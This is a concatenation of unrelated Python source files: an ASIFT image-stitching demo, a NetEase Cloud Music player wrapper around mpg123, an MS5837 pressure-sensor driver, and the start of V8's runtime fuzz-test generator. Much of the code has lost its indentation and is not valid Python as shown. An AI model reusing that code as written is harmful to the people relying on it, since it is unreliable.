flag_filter_scaled = opts.get("flag_filter_scaled",False)
flag_filter_original = opts.get("flag_filter_original",False)
flag_filter_out = opts.get("flag_filter_out",False)
flag_invertH = opts.get("flag_invertH",False)
flag_show_match = opts.get("flag_show_match",True)
flag_show_result = opts.get("flag_show_result",True)
flag_save_perspective = opts.get("flag_save_perspective",False)
flag_save_result = opts.get("flag_save_result",False)
#### LOADING
#feature_name = opts.get('--feature', 'sift-flann') #default is 'sift-flann'
#detector, matcher = init_feature(feature_name)
original_fore = opts.get("original_fore",None)
scaled_fore = opts.get("scaled_fore",None)
try: fn1 = opts["fn1"]
except:
fn1 = paths.TESTPATH+'im1_2.jpg' # foreground is placed to background
if not original_fore:
original_fore = cv2.imread(fn1) # foreground
print(fn1, " Loaded...")
#### SCALING
rzyf,rzxf = opts.get("fore_scale",(400,400)) # dimensions to scale foreground
if not scaled_fore:
scaled_fore = cv2.resize(cv2.imread(fn1, 0), (rzxf, rzyf))
original_back = opts.get("original_back",None)
scaled_back = opts.get("scaled_back",None)
try: fn2 = opts["fn2"]
except:
fn2 = paths.TESTPATH+'im1_1.jpg' # background
if not original_back:
original_back = cv2.imread(fn2) # background
print(fn2, " Loaded...")
#### SCALING
rzyb,rzxb = opts.get("back_scale",(400,400)) # dimensions to scale background
if not scaled_back:
scaled_back = cv2.resize(cv2.imread(fn2, 0), (rzxb, rzyb))
#### PRE-PROCESSING
if flag_filter_scaled: # persistent by @root.memoize
d,sigmaColor,sigmaSpace = 50,100,100
scaled_fore = bilateralFilter(scaled_fore,d,sigmaColor,sigmaSpace)
scaled_back = bilateralFilter(scaled_back,d,sigmaColor,sigmaSpace)
print("merged image filtered with bilateral filter d={},sigmaColor={},sigmaSpace={}".format(d,sigmaColor,sigmaSpace))
if flag_filter_original: # persistent by @root.memoize
d,sigmaColor,sigmaSpace = 50,100,100
original_fore = bilateralFilter(original_fore,d,sigmaColor,sigmaSpace)
original_back = bilateralFilter(original_back,d,sigmaColor,sigmaSpace)
print("merged image filtered with bilateral filter d={},sigmaColor={},sigmaSpace={}".format(d,sigmaColor,sigmaSpace))
#### FEATURE DETECTOR # persistent by @root.memoize
print("finding keypoints with its descriptos...")
result = multipleASIFT([scaled_fore, scaled_back]) # OR use ASIFT for each image
#kp1,desc1 = ASIFT(feature_name, scaled_fore, mask=None, pool=pool)
#kp2,desc2 = ASIFT(feature_name, scaled_back, mask=None, pool=pool)
#### MATCHING # persistent by @root.memoize
print("matching...")
H, status, kp_pairs = multipleMATCH(result)[0] # OR use MATCH
#H, status, kp_pairs = MATCH(feature_name,kp1,desc1,kp2,desc2)
if H is not None:
if flag_invertH:
kp_pairs = [(j,i) for i,j in kp_pairs]
H = convert.invertH(H)
tmp1,tmp2,tmp3,tmp4 = original_fore,scaled_fore,original_back,scaled_back
original_fore,scaled_fore,original_back,scaled_back = tmp3,tmp4,tmp1,tmp2
shapes = original_fore.shape,scaled_fore.shape,original_back.shape,scaled_back.shape
H2 = convert.sh2oh(H, *shapes) #### sTM to oTM
if flag_show_match: # show matching
win = 'matching result'
kp_pairs2 = spairs2opairs(kp_pairs,*shapes)
print("waiting to close match explorer...")
vis = matchExplorer(win, original_fore, original_back, kp_pairs2, status, H2)
#vis = MatchExplorer(win, scaled_fore, scaled_back, kp_pairs, status, H)
# get perspective from the scaled to original Transformation matrix
bgra_fore = cv2.cvtColor(original_fore,cv2.COLOR_BGR2BGRA) # convert BGR to BGRA
fore_in_back = cv2.warpPerspective(bgra_fore,H2,(original_back.shape[1],original_back.shape[0])) # get perspective
foregray = cv2.cvtColor(fore_in_back,cv2.COLOR_BGRA2GRAY).astype(float) # convert formats to float
fore_in_back = fore_in_back.astype(float) # convert to float to make operations
saveas = "perspective.png"
if flag_save_perspective:
cv2.imwrite(saveas,fore_in_back) # save perspective
print("perspective saved as: "+saveas)
# find alfa and do overlay
alfa = fore_in_back[:,:,3].copy()
for i in range(1): # testing damage by iteration
backgray = cv2.cvtColor(original_back.astype(np.uint8),cv2.COLOR_BGR2GRAY).astype(float)
fore_in_back[:,:,3]= getalfa(foregray,backgray,alfa) #### GET ALFA MASK
original_back = ar.overlay(original_back, fore_in_back) #### MERGING
original_back = original_back.astype(np.uint8) # convert back to uint8
#### POST-PROCESSING
if flag_filter_out: # filter # persistent by @root.memoize
# http://docs.opencv.org/modules/imgproc/doc/filtering.html
d,sigmaColor,sigmaSpace =50,100,100 # best guess: (50,100,10), opencv: (9,75,75), d=-1 is filter distance until sigma
original_back = bilateralFilter(original_back,d,sigmaColor,sigmaSpace)
saveas = "merged_bilateralfilter_d_{}_sigmaColor_{}_sigmaSapace_{}.png".format(d,sigmaColor,sigmaSpace)
title = "bilateral filtered d={},sigmaColor={},sigmaSpace={}".format(d,sigmaColor,sigmaSpace)
else:
saveas = "merged_nofilter.png"
title = "merged image"
print("image merged...")
if flag_show_result: # plot result
plt = plotter.plt
plt.imshow(cv2.cvtColor(original_back,cv2.COLOR_BGR2RGB))
plt.title(title), plt.xticks([]), plt.yticks([])
plt.show()
if flag_save_result:
cv2.imwrite(saveas,original_back) # save result
print("result saved as: "+saveas)
print("process finished... ")
def asif_demo2(args=None):
#### LOADING
#feature_name = opts.get('--feature', 'sift-flann') #default is 'sift-flann'
#detector, matcher = init_feature(feature_name)
try: fn1, fn2 = args
except:
fn1 = paths.TESTPATH+'im1_2.jpg' # foreground is placed to background
fn2 = paths.TESTPATH+'im1_1.jpg' # background
def check(im, fn):
if im is not None:
print(fn, " Loaded...")
else:
print(fn, " could not be loaded...")
#original_fore = cv2.imread(fn1) # foreground
#original_back = cv2.imread(fn2) # background
#checkLoaded(original_fore, fn1)
#checkLoaded(original_back, fn2)
#### SCALING
rzyf,rzxf = 400,400 # dimensions to scale foreground
rzyb,rzxb = 400,400 # dimensions to scale background
scaled_fore = cv2.resize(cv2.imread(fn1, 0), (rzxf, rzyf))
scaled_back = cv2.resize(cv2.imread(fn2, 0), (rzxb, rzyb))
check(scaled_fore, fn1)
check(scaled_back, fn2)
#### FEATURE DETECTOR # persistent by @root.memoize
print("finding keypoints with its descriptos...")
result = multipleASIFT([scaled_fore, scaled_back]) # OR use ASIFT for each image
#kp1,desc1 = ASIFT(feature_name, scaled_fore, mask=None, pool=pool)
#kp2,desc2 = ASIFT(feature_name, scaled_back, mask=None, pool=pool)
#### MATCHING # persistent by @root.memoize
print("matching...")
H, status, kp_pairs = multipleMATCH(result)[0] # OR use MATCH
#H, status, kp_pairs = MATCH(feature_name,kp1,desc1,kp2,desc2)
if H is not None:
from multiprocessing import Process
#shapes = original_fore.shape,scaled_fore.shape,original_back.shape,scaled_back.shape
#H2 = sh2oh(H,*shapes) #### sTM to oTM
#kp_pairs2 = spairs2opairs(kp_pairs,*shapes)
print("waiting to close match explorer...")
win = "stitch"
p = Process(target=superposeGraph,args= (win, scaled_fore, scaled_back, H))
p.start()
win = "inverted stitch"
p2 = Process(target=superposeGraph,args= (win, scaled_back, scaled_fore, invertH(H)))
p2.start()
win = 'matching result'
vis = explore_match(win, scaled_fore, scaled_back, kp_pairs, status, H)
p.join()
def stitch():
from multiprocessing import Process
from glob import glob
from RRtool.RRtoolbox import imloader
#### LOADING
print("looking in path {}".format(paths.TESTPATH))
fns = glob(paths.TESTPATH + "*.jpg")
fns = fns[:3]
print("found {} filtered files...".format(len(fns)))
#### SCALING
rzyf,rzxf = 400,400 # dimensions to scale foregrounds
#ims = [cv2.resize(cv2.imread(i, 0), (rzxf, rzyf)) for i in fns] # normal list
ims = imloader(fns,0, (rzxf, rzyf)) # load just when needed
#img = [i for i in ims] # tests
#ims = imloader(fns,0, (rzxf, rzyf),mmap=True,mpath=paths.TEMPPATH) # load just when needed
#img = [i for i in ims] # tests
#ims = [numpymapper(data, str(changedir(fns[i],paths.TEMPPATH))) for i,data in enumerate(imloader(fns))] # Too slow
#nfns = [changedir(i,paths.TEMPPATH) for i in fns] # this get the temp files
#### FEATURE DETECTOR # persistent by @root.memoize
print("finding keypoints with its descriptors...")
descriptors = multipleASIFT(ims) # OR use ASIFT for each image
print("total descriptors {}".format(len(descriptors)))
#### MATCHING
# H, status, kp_pairs
threads,counter = [],0
print("matching...")
for i in range(len(descriptors)):
for j in range(len(descriptors)):
if j>i: # do not test itself and inverted tests
counter +=1
print("comparision No.{}".format(counter))
# FIXME inefficient code ... just 44 descriptors generate 946 Homographies
fore,back = ims[i], ims[j]
(kp1,desc1),(kp2,desc2) = descriptors[i],descriptors[j]
H, status, kp_pairs = MATCH(feature_name,kp1,desc1,kp2,desc2)
inlines,lines = np.sum(status), len(status)
pro = old_div(float(inlines),lines)
test = pro>0.5 # do test to see if both match
win = '{0}({2}) - {1}({3}) inliers({4})/matched({5}) rate({6}) pass({7})'.format(i,j,len(kp1),len(kp2), inlines,lines,pro,test)
d = Process(target=explore_match,args = (win, fore, back, kp_pairs, status, H))
d.start()
threads.append(d)
if test:
pass
for t in threads:
t.join()
if __name__ == "__main__":
#asif_demo()
asif_demo2()
#stitch()
|
player.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: omi
# @Date: 2014-07-15 15:48:27
# @Last Modified by: omi
# @Last Modified time: 2015-01-30 18:05:08
'''
NetEase Cloud Music (网易云音乐) Player
'''
# Let's make some noise
from __future__ import (
print_function, unicode_literals, division, absolute_import
)
import subprocess
import threading
import time
import os
import random
from future.builtins import str
from .ui import Ui
from .storage import Storage
from .api import NetEase
from .cache import Cache
from .config import Config
from .utils import notify
from . import logger
log = logger.getLogger(__name__)
class Player(object):
MODE_ORDERED = 0
MODE_ORDERED_LOOP = 1
MODE_SINGLE_LOOP = 2
MODE_RANDOM = 3
MODE_RANDOM_LOOP = 4
def __init__(self):
self.config = Config()
self.ui = Ui()
self.popen_handler = None
# flag stop, prevent thread start
self.playing_flag = False
self.process_length = 0
self.process_location = 0
self.storage = Storage()
self.cache = Cache()
self.end_callback = None
self.playing_song_changed_callback = None
self.api = NetEase()
@property
def info(self):
return self.storage.database['player_info']
@property
def songs(self):
return self.storage.database['songs']
@property
def index(self):
return self.info['idx']
@property
def list(self):
return self.info['player_list']
@property
def order(self):
return self.info['playing_order']
@property
def mode(self):
return self.info['playing_mode']
@property
def is_ordered_mode(self):
return self.mode == Player.MODE_ORDERED
@property
def is_ordered_loop_mode(self):
return self.mode == Player.MODE_ORDERED_LOOP
@property
def is_single_loop_mode(self):
return self.mode == Player.MODE_SINGLE_LOOP
@property
def is_random_mode(self):
return self.mode == Player.MODE_RANDOM
@property
def is_random_loop_mode(self):
return self.mode == Player.MODE_RANDOM_LOOP
@property
def config_notifier(self):
return self.config.get('notifier')
@property
def config_mpg123(self):
return self.config.get('mpg123_parameters')
@property
def current_song(self):
if not self.songs:
return {}
if not self.is_index_valid:
return {}
song_id = self.list[self.index]
return self.songs.get(song_id, {})
@property
def playing_id(self):
return self.current_song['song_id']
@property
def playing_name(self):
return self.current_song['song_name']
@property
def is_empty(self):
return len(self.list) == 0
@property
def is_index_valid(self):
return 0 <= self.index < len(self.list)
def notify_playing(self):
if not self.current_song:
return
if not self.config_notifier:
return
song = self.current_song
notify('Now playing: {}\n{}-{}'.format(song['song_name'], song['artist'], song['album_name']))
def notify_copyright_issue(self):
log.warning('Song {} is unavailable due to copyright issue.'.format(self.playing_id))
notify('Unable to play this song due to copyright restrictions')
def change_mode(self, step=1):
self.info['playing_mode'] = (self.info['playing_mode'] + step) % 5
def build_playinfo(self):
if not self.current_song:
return
self.ui.build_playinfo(
self.current_song['song_name'],
self.current_song['artist'],
self.current_song['album_name'],
self.current_song['quality'],
time.time(), pause=not self.playing_flag
)
def add_songs(self, songs):
for song in songs:
song_id = str(song['song_id'])
self.info['player_list'].append(song_id)
if song_id in self.songs:
self.songs[song_id].update(song)
else:
self.songs[song_id] = song
def stop(self):
if not self.popen_handler:
return
self.playing_flag = False
self.popen_handler.stdin.write(b'Q\n')
self.popen_handler.stdin.flush()
self.popen_handler.kill()
self.popen_handler = None
# wait for the process to be killed
time.sleep(0.01)
def tune_volume(self, up=0):
if not self.popen_handler:
return
new_volume = self.info['playing_volume'] + up
if new_volume > 100:
new_volume = 100
elif new_volume < 0:
new_volume = 0
self.info['playing_volume'] = new_volume
self.popen_handler.stdin.write(
'V {}\n'.format(self.info['playing_volume']).encode()
)
self.popen_handler.stdin.flush()
def switch(self):
if not self.popen_handler:
return
self.playing_flag = not self.playing_flag
self.popen_handler.stdin.write(b'P\n')
self.popen_handler.stdin.flush()
self.build_playinfo()
def run_mpg123(self, on_exit, url):
para = ['mpg123', '-R'] + self.config_mpg123
self.popen_handler = subprocess.Popen(
para,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.tune_volume()
self.popen_handler.stdin.write(b'L ' + url.encode('utf-8') + b'\n')
self.popen_handler.stdin.flush()
endless_loop_cnt = 0
while True:
if not self.popen_handler:
break
strout = self.popen_handler.stdout.readline().decode('utf-8').strip()
if strout[:2] == '@F':
# playing, update progress
out = strout.split(' ')
self.process_location = int(float(out[3]))
self.process_length = int(float(out[3]) + float(out[4]))
elif strout[:2] == '@E':
# error; leave playing_flag set so we advance to the next song after breaking
self.playing_flag = True
self.notify_copyright_issue()
break
elif strout == '@P 0':
# end, moving to next
self.playing_flag = True
break
elif strout == '':
endless_loop_cnt += 1
# mpg123 sometimes keeps emitting empty messages instead of exiting after
# playback; bail out here to avoid spinning forever
if endless_loop_cnt > 100:
log.warning('mpg123 stuck in an endless loop emitting empty output (high CPU use); killing it')
break
if self.playing_flag:
self.next()
else:
self.stop()
def download_lyric(self, is_translated=False):
key = 'lyric' if not is_translated else 'tlyric'
if key not in self.songs[str(self.playing_id)]:
self.songs[str(self.playing_id)][key] = []
if len(self.songs[str(self.playing_id)][key]) > 0:
return
if not is_translated:
lyric = self.api.song_lyric(self.playing_id)
else:
lyric = self.api.song_tlyric(self.playing_id)
self.songs[str(self.playing_id)][key] = lyric
def download_song(self, song_id, song_name, artist, url):
def write_path(song_id, path):
self.songs[str(song_id)]['cache'] = path
self.cache.add(song_id, song_name, artist, url, write_path)
self.cache.start_download()
def start_playing(self, on_exit, args):
'''
Plays the given song with mpg123 in a background thread and calls the
function on_exit when the subprocess completes.
on_exit is a callable object, and args is the song's metadata dict
(song_id, song_name, artist, mp3_url and, when available, a local cache path).
'''
log.debug("%s,%s,%s" % (args['song_id'], args['song_name'], args['mp3_url']))
if 'cache' in args.keys() and os.path.isfile(args['cache']):
thread = threading.Thread(target=self.run_mpg123,
args=(on_exit, args['cache']))
else:
thread = threading.Thread(target=self.run_mpg123,
args=(on_exit, args['mp3_url']))
cache_thread = threading.Thread(
target=self.download_song,
args=(args['song_id'], args['song_name'], args['artist'], args['mp3_url'])
)
cache_thread.start()
thread.start()
lyric_download_thread = threading.Thread(target=self.download_lyric)
lyric_download_thread.start()
tlyric_download_thread = threading.Thread(target=self.download_lyric, args=(True,))
tlyric_download_thread.start()
# returns immediately after the thread starts
return thread
def replay(self):
if not self.is_index_valid:
self.stop()
if self.end_callback:
log.debug('Callback')
self.end_callback()
return
if not self.current_song:
return
self.playing_flag = True
self.build_playinfo()
self.notify_playing()
self.start_playing(lambda: 0, self.current_song)
def shuffle_order(self):
del self.order[:]
self.order.extend(list(range(0, len(self.list))))
random.shuffle(self.order)
self.info['random_index'] = 0
def new_player_list(self, type, title, datalist, offset):
self.info['player_list_type'] = type
self.info['player_list_title'] = title
# self.info['idx'] = offset
self.info['player_list'] = []
self.info['playing_order'] = []
self.info['random_index'] = 0
self.add_songs(datalist)
def append_songs(self, datalist):
self.add_songs(datalist)
def play_or_pause(self, idx):
if self.is_empty:
return
# if same "list index" and "playing index" --> same song :: pause/resume it
if self.index == idx:
if not self.popen_handler:
self.replay()
else:
self.switch()
else:
self.info['idx'] = idx
self.stop()
self.replay()
def _swap_song(self):
now_songs = self.order.index(self.index)
self.order[0], self.order[now_songs] = self.order[now_songs], self.order[0]
def _need_to_shuffle(self):
playing_order = self.order
random_index = self.info['random_index']
if random_index >= len(playing_order) or playing_order[random_index] != self.index:
return True
else:
return False
def next_idx(self):
if not self.is_index_valid:
return self.stop()
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
# make sure self.index does not run past the end of the playlist
if self.info['idx'] < playlist_len:
self.info['idx'] += 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info['idx'] = (self.index + 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info['idx'] = self.info['idx']
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
# When the playing order is regenerated,
# keep the currently playing song in the same (first) position.
self._swap_song()
playing_order_len = len(self.order)
self.info['random_index'] += 1
# In random-loop mode, wrap around at the end of the shuffled order.
if self.mode == Player.MODE_RANDOM_LOOP:
self.info['random_index'] %= playing_order_len
# Random without looping: past the end of the order, stop playing.
if self.info['random_index'] >= playing_order_len:
self.info['idx'] = playlist_len
else:
self.info['idx'] = self.order[self.info['random_index']]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def next(self):
self.stop()
self.next_idx()
self.replay()
def prev_idx(self):
if not self.is_index_valid:
self.stop()
return
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
if self.info['idx'] > 0:
self.info['idx'] -= 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info['idx'] = (self.info['idx'] - 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info['idx'] = self.info['idx']
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
playing_order_len = len(self.order)
self.info['random_index'] -= 1
if self.info['random_index'] < 0:
if self.mode == Player.MODE_RANDOM:
self.info['random_index'] = 0
else:
self.info['random_index'] %= playing_order_len
self.info['idx'] = self.order[self.info['random_index']]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def prev(self):
self.stop()
self.prev_idx()
self.replay()
def shuffle(self):
self.stop()
self.info['playing_mode'] = Player.MODE_RANDOM
self.shuffle_order()
self.info['idx'] = self.info['playing_order'][self.info['random_index']]
self.replay()
def volume_up(self):
self.tune_volume(5)
def volume_down(self):
self.tune_volume(-5)
def update_size(self):
self.ui.update_size()
self.build_playinfo()
def cache_song(self, song_id, song_name, artist, song_url):
def on_exit(song_id, path):
self.songs[str(song_id)]['cache'] = path
self.cache.enable = False
self.cache.enable = True
self.cache.add(song_id, song_name, artist, song_url, on_exit)
self.cache.start_download()
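# Hedged sketch (not part of the original class): the minimal mpg123 remote-
# control round trip that Player.run_mpg123 relies on. Commands go to stdin
# ("L <url>" load, "V <0-100>" volume, "P" pause/resume, "Q" quit); status
# lines such as "@F ..." (progress) and "@P 0" (finished) come back on stdout.
# `url` is a placeholder; subprocess is already imported at the top of this
# module.
def _mpg123_remote_demo(url):
    proc = subprocess.Popen(['mpg123', '-R'],
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    proc.stdin.write(b'V 50\n')                             # set volume to 50%
    proc.stdin.write(b'L ' + url.encode('utf-8') + b'\n')   # load and play
    proc.stdin.flush()
    for raw in proc.stdout:
        line = raw.decode('utf-8', 'ignore').strip()
        if line.startswith('@F'):                           # playback progress
            continue
        if line == '@P 0':                                   # playback finished
            break
    proc.stdin.write(b'Q\n')                                 # quit mpg123
    proc.stdin.flush()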
|
sensor_driver.py
|
#...................Drive a pressure/temperature sensor..................
#Author: James Bramante
#Date: May 8, 2017
import ms5837
import threading
import time
import statistics as stats
class SensorDriver(object):
def __init__(self, samplerate = 100., density = 997., baseTime = 0.):
""" Constructor
:type samplerate: float
:type density: float
:param samplerate: rate at which to sample the pressure sensor, in Hz
:param density: density of the water, kg m^-3
"""
#Parse the input parameters
self.samplerate = samplerate
self.density = density
#FINAL variables
self.I2CBUS = 1
self.GRAV = 9.81
#Initialize the sensor
self.sensor = ms5837.MS5837_30BA()
test1 = self.sensor.init()
test2 = self.sensor.read()
self.initialized = test1 & test2
self.running = False
#Initialize output variables
if (baseTime == 0.):
self.baseTime = time.time()
else:
self.baseTime = baseTime
self.basepress = []
for x in range(1,10):
self.sensor.read()
self.basepress += [self.sensor.pressure()]
time.sleep(0.3)
self.basepress = stats.mean(self.basepress)
self.time = [time.time()-self.baseTime]
self.temp = [self.sensor.temperature()]
self.press = [self.basepress]
self.depth = [0]
def daemonize(self):
#Daemonize the run function and thread it
self.thread = threading.Thread(target=self.run,args=(),daemon=True)
self.thread.start()
#Collects sensor data in the background
def run(self):
self.running = True
while self.running:
#Produce pressure and temperature and depth data
self.sensor.read()
self.time += [time.time()-self.baseTime]
self.temp += [self.sensor.temperature()]
self.press += [self.sensor.pressure()]
self.depth += [(self.sensor.pressure() - self.basepress)/self.density/self.GRAV]
#Wait designated interval
time.sleep(1/self.samplerate)
#Stop sampling data
def stop(self):
self.running = False
#Reset the sensor and start recording again, but keep parameters
def reset(self):
self.running = False
#Re-initialize the sensor
self.sensor = ms5837.MS5837_30BA()
self.sensor.init()
#Re-initialize everything
self.baseTime = time.time()
self.basepress = []
for x in range(1,10):
self.sensor.read()
self.basepress += [self.sensor.pressure()]
time.sleep(0.3)
self.basepress = stats.mean(self.basepress)
self.time = [time.time()-self.baseTime]
self.temp = [self.sensor.temperature()]
self.press = [self.basepress]
self.depth = [0]
#Restart the recording thread
self.daemonize()
#Reset the recorded times to a new time origin
def resetClock(self):
newTime = time.time()
self.time = [t - (newTime - self.baseTime) for t in self.time]
self.baseTime = newTime
#Set parameter values
def setDensity(self,den):
self.density = den
def setSamplerate(self,rat):
self.samplerate = rat
#Read recorded values and drop them from the buffers as they are reported
def readValues(self):
#The newest time entry may not yet have matching pressure/temperature/depth
#values, so report only the samples that are complete
tempLength = len(self.time)-1
t = self.time[:tempLength]
p = self.press[:tempLength]
T = self.temp[:tempLength]
d = self.depth[:tempLength]
#Only keep the data that has not been reported yet
self.time = self.time[tempLength:]
self.press = self.press[tempLength:]
self.temp = self.temp[tempLength:]
self.depth = self.depth[tempLength:]
return (t,p,T,d)
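#Hedged usage sketch (requires an MS5837 sensor on the I2C bus; not part of
#the driver itself). Start background sampling, collect for a few seconds,
#then read out the buffered time/pressure/temperature/depth series.
if __name__ == "__main__":
    driver = SensorDriver(samplerate=10.)
    if driver.initialized:
        driver.daemonize()
        time.sleep(5)
        driver.stop()
        t, p, T, d = driver.readValues()
        print("collected {} samples".format(len(t)))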
|
generate-runtime-tests.py
|
#!/usr/bin/env python
# Copyright 2014 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import itertools
import js2c
import multiprocessing
import optparse
import os
import random
import re
import shutil
import signal
import string
import subprocess
import sys
import time
FILENAME = "src/runtime.cc"
HEADERFILENAME = "src/runtime.h"
FUNCTION = re.compile("^RUNTIME_FUNCTION\(Runtime_(\w+)")
ARGSLENGTH = re.compile(".*ASSERT\(.*args\.length\(\) == (\d+)\);")
FUNCTIONEND = "}\n"
MACRO = re.compile(r"^#define ([^ ]+)\(([^)]*)\) *([^\\]*)\\?\n$")
FIRST_WORD = re.compile("^\s*(.*?)[\s({\[]")
WORKSPACE = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), ".."))
BASEPATH = os.path.join(WORKSPACE, "test", "mjsunit", "runtime-gen")
THIS_SCRIPT = os.path.relpath(sys.argv[0])
# Expand these macros, they define further runtime functions.
EXPAND_MACROS = [
"BUFFER_VIEW_GETTER",
"DATA_VIEW_GETTER",
"DATA_VIEW_SETTER",
"RUNTIME_UNARY_MATH",
]
# TODO(jkummerow): We could also whitelist the following macros, but the
# functions they define are so trivial that it's unclear how much benefit
# that would provide:
# ELEMENTS_KIND_CHECK_RUNTIME_FUNCTION
# FIXED_TYPED_ARRAYS_CHECK_RUNTIME_FUNCTION
# TYPED_ARRAYS_CHECK_RUNTIME_FUNCTION
# Counts of functions in each detection state. These are used to assert
# that the parser doesn't bit-rot. Change the values as needed when you add,
# remove or change runtime functions, but make sure we don't lose our ability
# to parse them!
EXPECTED_FUNCTION_COUNT = 417
EXPECTED_FUZZABLE_COUNT = 332
EXPECTED_CCTEST_COUNT = 8
EXPECTED_UNKNOWN_COUNT = 4
EXPECTED_BUILTINS_COUNT = 809
# Don't call these at all.
BLACKLISTED = [
"Abort", # Kills the process.
"AbortJS", # Kills the process.
"CompileForOnStackReplacement", # Riddled with ASSERTs.
"IS_VAR", # Not implemented in the runtime.
"ListNatives", # Not available in Release mode.
"SetAllocationTimeout", # Too slow for fuzzing.
"SystemBreak", # Kills (int3) the process.
# These are weird. They violate some invariants when called after
# bootstrapping.
"DisableAccessChecks",
"EnableAccessChecks",
# The current LiveEdit implementation relies on and messes with internals
# in ways that makes it fundamentally unfuzzable :-(
"DebugGetLoadedScripts",
"DebugSetScriptSource",
"LiveEditFindSharedFunctionInfosForScript",
"LiveEditFunctionSourceUpdated",
"LiveEditGatherCompileInfo",
"LiveEditPatchFunctionPositions",
"LiveEditReplaceFunctionCode",
"LiveEditReplaceRefToNestedFunction",
"LiveEditReplaceScript",
"LiveEditRestartFrame",
"SetScriptBreakPoint",
# TODO(jkummerow): Fix these and un-blacklist them!
"CreateDateTimeFormat",
"CreateNumberFormat",
# TODO(danno): Fix these internal functions that are only callable from stubs
# and un-blacklist them!
"NumberToString",
"RxegExpConstructResult",
"RegExpExec",
"StringAdd",
"SubString",
"StringCompare",
"StringCharCodeAt",
"GetFromCache",
# Compilation
"CompileUnoptimized",
"CompileOptimized",
"TryInstallOptimizedCode",
"NotifyDeoptimized",
"NotifyStubFailure",
# Utilities
"AllocateInNewSpace",
"AllocateInTargetSpace",
"AllocateHeapNumber",
"NumberToSmi",
"NumberToStringSkipCache",
"NewSloppyArguments",
"NewStrictArguments",
# Harmony
"CreateJSGeneratorObject",
"SuspendJSGeneratorObject",
"ResumeJSGeneratorObject",
"ThrowGeneratorStateError",
# Arrays
"ArrayConstructor",
"InternalArrayConstructor",
# Literals
"MaterializeRegExpLiteral",
"CreateObjectLiteral",
"CreateArrayLiteral",
"CreateArrayLiteralStubBailout",
# Statements
"NewClosure",
"NewClosureFromStubFailure",
"NewObject",
"NewObjectWithAllocationSite",
"FinalizeInstanceSize",
"Throw",
"ReThrow",
"ThrowReferenceError",
"ThrowNotDateError",
"StackGuard",
"Interrupt",
"PromoteScheduledException",
# Contexts
"NewGlobalContext",
"NewFunctionContext",
"PushWithContext",
"PushCatchContext",
"PushBlockContext",
"PushModuleContext",
"DeleteLookupSlot",
"LoadLookupSlot",
"LoadLookupSlotNoReferenceError",
"StoreLookupSlot",
# Declarations
"DeclareGlobals",
"DeclareModules",
"DeclareContextSlot",
"InitializeConstGlobal",
"InitializeConstContextSlot",
# Eval
"ResolvePossiblyDirectEval",
# Maths
"MathPowSlow",
"MathPowRT"
]
# These will always throw.
THROWS = [
"CheckExecutionState", # Needs to hit a break point.
"CheckIsBootstrapping", # Needs to be bootstrapping.
"DebugEvaluate", # Needs to hit a break point.
"DebugEvaluateGlobal", # Needs to hit a break point.
"DebugIndexedInterceptorElementValue", # Needs an indexed interceptor.
"DebugNamedInterceptorPropertyValue", # Needs a named interceptor.
"DebugSetScriptSource", # Checks compilation state of script.
"GetAllScopesDetails", # Needs to hit a break point.
"GetFrameCount", # Needs to hit a break point.
"GetFrameDetails", # Needs to hit a break point.
"GetRootNaN", # Needs to be bootstrapping.
"GetScopeCount", # Needs to hit a break point.
"GetScopeDetails", # Needs to hit a break point.
"GetStepInPositions", # Needs to hit a break point.
"GetTemplateField", # Needs a {Function,Object}TemplateInfo.
"GetThreadCount", # Needs to hit a break point.
"GetThreadDetails", # Needs to hit a break point.
"IsAccessAllowedForObserver", # Needs access-check-required object.
"UnblockConcurrentRecompilation" # Needs --block-concurrent-recompilation.
]
# Definitions used in CUSTOM_KNOWN_GOOD_INPUT below.
_BREAK_ITERATOR = (
"%GetImplFromInitializedIntlObject(new Intl.v8BreakIterator())")
_COLLATOR = "%GetImplFromInitializedIntlObject(new Intl.Collator('en-US'))"
_DATETIME_FORMAT = (
"%GetImplFromInitializedIntlObject(new Intl.DateTimeFormat('en-US'))")
_NUMBER_FORMAT = (
"%GetImplFromInitializedIntlObject(new Intl.NumberFormat('en-US'))")
# Custom definitions for function input that does not throw.
# Format: "FunctionName": ["arg0", "arg1", ..., argslength].
# None means "fall back to autodetected value".
CUSTOM_KNOWN_GOOD_INPUT = {
"AddNamedProperty": [None, "\"bla\"", None, None, None],
"AddPropertyForTemplate": [None, 10, None, None, None],
"Apply": ["function() {}", None, None, None, None, None],
"ArrayBufferSliceImpl": [None, None, 0, None],
"ArrayConcat": ["[1, 'a']", None],
"BreakIteratorAdoptText": [_BREAK_ITERATOR, None, None],
"BreakIteratorBreakType": [_BREAK_ITERATOR, None],
"BreakIteratorCurrent": [_BREAK_ITERATOR, None],
"BreakIteratorFirst": [_BREAK_ITERATOR, None],
"BreakIteratorNext": [_BREAK_ITERATOR, None],
"CompileString": [None, "false", None],
"CreateBreakIterator": ["'en-US'", "{type: 'string'}", None, None],
"CreateJSFunctionProxy": [None, "function() {}", None, None, None],
"CreatePrivateSymbol": ["\"foo\"", None],
"CreateSymbol": ["\"foo\"", None],
"DateParseString": [None, "new Array(8)", None],
"DefineAccessorPropertyUnchecked": [None, None, "function() {}",
"function() {}", 2, None],
"FunctionBindArguments": [None, None, "undefined", None, None],
"GetBreakLocations": [None, 0, None],
"GetDefaultReceiver": ["function() {}", None],
"GetImplFromInitializedIntlObject": ["new Intl.NumberFormat('en-US')", None],
"InternalCompare": [_COLLATOR, None, None, None],
"InternalDateFormat": [_DATETIME_FORMAT, None, None],
"InternalDateParse": [_DATETIME_FORMAT, None, None],
"InternalNumberFormat": [_NUMBER_FORMAT, None, None],
